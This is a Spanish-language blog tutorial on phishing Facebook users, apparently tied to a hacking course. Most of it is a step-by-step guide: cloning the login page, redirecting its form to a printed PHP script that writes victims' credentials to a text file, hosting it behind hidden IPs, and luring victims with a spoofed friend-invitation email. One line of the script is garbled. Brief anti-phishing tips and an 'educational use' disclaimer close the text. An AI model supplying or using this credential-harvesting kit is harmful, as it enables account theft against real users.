Hacking tutorial: Phishing en Facebook

Comienza a aprender de forma profesional todo lo relacionado con la ciberseguridad con el curso de hacking web, un curso online perfecto para iniciarse. En este momento puedes realizar esta formación de forma gratuita, ya que estamos ofreciendo 15 días de prueba para acceder a los cursos y talleres de nuestra plataforma.

Mientras tanto, os serguiré hablando sobre el cuidado que tenemos que tener con nuestros datos, dónde los ubicamos, qué es lo que subimos… pero hoy os mostraré cómo también tenemos que tener cuidado de dónde nos metemos a la hora de navegar.

Hoy hablaremos de phishing, un método por el que “una persona malvada” duplica una web a la que accedemos mediante usuario y contraseña, y hace que nuestros credenciales en lugar de llegar a la original, queden almacenadas en su servidor .

Aquí un ejemplo:

Facebook:

Nos dirigimos a la página de Facebook y en cualquier espacio en blanco clicamos con el botón derecho del ratón para obtener el menú contextual y seleccionar la opción “Ver código fuente de la página”.

Esto nos abrirá una nueva pestaña (al menos en Chrome que es el navegador que estoy usando) que nos mostrará dicho código , el cual seleccionaremos y lo copiaremos a un documento nuevo del bloc de notas al que llamaremos “index.html” (sin las comillas que todavía hay algunos que caen en esto…).

Ya en el bloc de notas, usaremos el comando Ctrl+B para buscar la cadena “action=” dentro del extenso código.

Como vemos, este “action=” apunta hacia una web donde se nos requerirá un inicio de sesión o login; y aquí es donde empezamos a trabajar. Sustituiremos esa dirección a la que apunta por “next.php”, y si leemos inmediatamente antes de nuestro “action=” vemos que el código especifica el método por el que se enviará la información de dicho login, que es ‘post’.

Pues bien, también deberemos cambiar el método ‘post’ por el método ‘get’ (otro día nos paramos a explicar la diferencia entre estos dos métodos de envío de datos) para que quede tal y como muestra la imagen siguiente, y sólo faltará guardar el documento como index.html.

A continuación, crearemos el script al que hemos redirigido la petición de login. Para esto abriremos un nuevo documento en el blog de notas que llamaremos next.php, y en el que copiaremos el siguiente código:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("yaeresmio.txt", "a"); 

foreach($_GET as $variable => $value) {
	fwrite($handle, $variable);

	fwrite($handle, "=");

	fwrite($handle, $value);

	fwrite($handle, "\r\n");
}

frité($ande, "\r\n");
fclose($handle);

exit
?>

Ahora crearemos un segundo archivo con el bloc de notas que llamaremos yaeresmio.txt y que cerraremos dejándolo en blanco.

El siguiente paso es subir estos tres archivos de texto a algún dominio o subdominio de algún hosting que tengamos (obviamente, este hosting debe proveer servicios php), además de contar con un servicio de redirección segura que oculte nuestra ip (nunca está de más prevenir…). El proceso es simple ya que hoy día hay muchos servicios hosting que ofrecen un plan básico de forma gratuita , que es lo que necesitamos en este momento, para ello nos registramos e iniciamos el proceso de creación de cuenta seleccionando el subdominio (si elegimos un plan gratuito no vamos a pagar ahora por un dominio, ¿no?) y la contraseña que usaremos.

Recordamos con la siguiente imagen que el hosting que seleccionemos provea servicios php para que nuestro script se ejecute sin problemas. Y dicho esto nos dirigimos al apartado de acceso FTP para subir nuestros archivos a la red.

Como vemos en la siguiente imagen , usando el propio gestor de archivos del hosting que hemos encontrado hemos subido con éxito nuestros archivos.

Vamos a entrar a nuestra dirección web para ver cómo verán nuestras víctimas la página que hemos copiado.

Comprobamos que con un par de ajustes en la codificación de caracteres todo quedaría de forma correcta, pero para este ejemplo y para que quede claro que es una página copiada vamos a dejar estos símbolos tal cual. Por lo que lo único que queda es intentar loguearnos en “nuestro Facebook”. Usaremos como credenciales la dirección de correo electrónico correo@deprueba.es y la contraseña “contraseñadeprueba”.

Y al hacer clic en ‘Entrar’, se nos redirige a la página auténtica de Facebook porque “parece ser que hemos escrito algo mal y debemos volver a introducir nuestros datos”.

Pero si en este momento nos dirigimos a nuestro hosting, y comprobamos el contenido del archivo “yaeresmio.txt” vemos esto que aparece en la siguiente imagen.

El correo y contraseña que hemos usado para nuestro ejemplo se ha almacenado en el archivo tal y como esperábamos , por lo que nuestra web de phishing está lista para funcionar.

Llegados a este punto sólo nos quedaría crear una cuenta de correo que usaríamos para captar posibles víctimas , en la que deberá aparecer la palabra Facebook para darle un mínimo de credibilidad (aunque no lo creáis hay gente que responde a direcciones como Facebook@hotmail.com o similares).

Buscaremos una invitación de amistad original de Facebook, para lo que podríamos usando cualquier perfil de Facebook, invitar a la dirección que hemos creado para tener dicha invitación sin salir de la sesión del gestor de correo.

Una vez que tenemos la invitación, sólo faltará redirigir los enlaces que nos llevan a las páginas oficiales de Facebook hacia nuestra web copiada , y una vez se intenten loguear en ella, el script comenzará a almacenar las contraseñas y usuarios en el documento yaeresmio.txt.

Visto cómo se realizan estos ataques de phishing, vamos con unos consejos o “señales” que nos ayudarán a hacer nuestra navegación más segura:

• Lo más importante de todo es que estos correos, como bien hemos dicho hace un momento es verificar que la dirección que nos remite el correo sea una fuente oficial de la web a la que nos están llamando a entrar. Lo más extendido son los casos en los que “nuestro banco nos pide que confirmemos nuestras contraseñas, claves bancarias o números de tarjeta entre otros datos”.
• Si vemos que hay algunos caracteres que no se muestran como es debido , podemos sospechar, pero también puede darse el caso de que la web sea la correcta pero no haya cargado 100% la estructura y se muestre con errores.
• Estaremos atentos a la barra de direcciones , ya que hoy día es bastante complicado encontrar webs que no usen https (o al menos así debería ser ¬¬).
• Si los correos con los que nos llaman a las webs contienen más de uno o dos errores de ortografía (a todos se nos pueden escapar erratas en una campaña de mailing…), sospechad.
• Cuando un mail no está personalizado , o la compañía no nos aprecia como clientes suyos o es un caso de phishing…. Ej. “Estimado usuario…”, Querido usuario...”, etc…
• Si por casualidad llegamos a la web pero algo nos resulta extraño, no dudéis en verificar todos los elementos . De aquellas páginas en las que cueste sacar el código fuente para que se vea todo correcto, estos malhechores usarán imágenes en su defecto en lugar de banners o botones como tales y esto ya debería dejarnos claro si estamos en la web indicada o no.

Ante cualquier duda con respecto a los tips anteriores, consultad siempre a atención al cliente o al contacto de los usuarios con la empresa o los dueños de la web, ellos os aclararán si han enviado esos correos o invitaciones o si están teniendo problemas con algunos elementos de sus webs, etc… y fuente más fiable que esa, pocas…

Recordad siempre que lo aquí expuesto es sólo para uso educativo , nada de andar phisheando por ahí a lo loco.

NOTA IMPORTANTE : Dejaré la página funcionando una semana, y el viernes 7 de Agosto publicaré lo que contiene el fichero “yaeresmio.txt”, por si queréis corroborar el funcionamiento de este método. NO, REPITO, NO introduzcáis vuestros datos reales a no ser que queráis que queden expuestos.